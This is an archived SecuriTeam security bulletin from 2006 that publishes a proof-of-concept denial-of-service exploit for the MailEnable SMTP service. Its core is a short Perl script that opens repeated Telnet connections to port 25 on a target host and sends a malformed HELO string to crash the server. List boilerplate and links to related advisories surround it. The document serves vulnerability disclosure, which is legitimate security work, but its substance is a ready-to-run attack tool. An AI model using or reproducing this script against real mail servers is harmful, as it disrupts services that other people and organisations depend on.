[EXPL] Mailenable SMTP Service DoS PoC

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Mailenable SMTP Service DoS PoC
------------------------------------------------------------------------


SUMMARY

" <http://www.mailenable.com/> MailEnable's mail server software provides
a powerful, scalable hosted messaging platform for Microsoft Windows."

Improper handling of user input allows attackers to DoS MailEnable.

DETAILS

Exploit:
#!/usr/bin/perl -w
#
# Mailenable SMTP DoS exploit
# 24/06/2006
#
# Filbert at divisionbyzero dot be
#

use Net::Telnet;

$string = "\0x99";

for ($count = 1; $count <= 10; $count++)
{
$telnet = new Net::Telnet ( Timeout=>60, Errmode=>'return',Port=>'25');
$telnet->open($ARGV[0]);use Net::Telnet;
$telnet->print("helo ", $string, "\n");
}

#EoF


ADDITIONAL INFORMATION

The information has been provided by
<mailto:divisionbyzerodotbe@xxxxxxxxx> db0.
The original article can be found at:
<http://www.divisionbyzero.be/?p=174> http://www.divisionbyzero.be/?p=174



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NT] BlueCoat WinProxy Multiple DoS and Buffer Overflow
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... BlueCoat WinProxy Multiple DoS and Buffer Overflow ... Improper handling of long requests within BlueCoat WinProxy ... 10/12/2005 Initial vendor notification about HTTP Remote DoS ...
    (Securiteam)
  • [NT] Firefox Remote Code Execution and DoS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Firefox Remote Code Execution and DoS ... Following link lead to page containing malicious DoS code. ...
    (Securiteam)
  • [EXPL] Internet Explorer input DoS (Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Internet Explorer input DoS ... Improper handling of input field allows attackers to DoS Microsoft ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
    (Securiteam)
  • [EXPL] FileZilla DoS Exploit (Long USER)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... FileZilla DoS Exploit ... A buffer overflow with FileZilla server allow attackers to cause a DoS on ...
    (Securiteam)
  • [NEWS] Senao SI-7800H VoIP Wireless Phone Information Disclosure and DoS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Senao SI-7800H VoIP Wireless Phone Information Disclosure and DoS ... An undocumented port and service in Senao SI-7800H allows attackers to ... This open port may allow an attacker unauthenticated access to the phone's ...
    (Securiteam)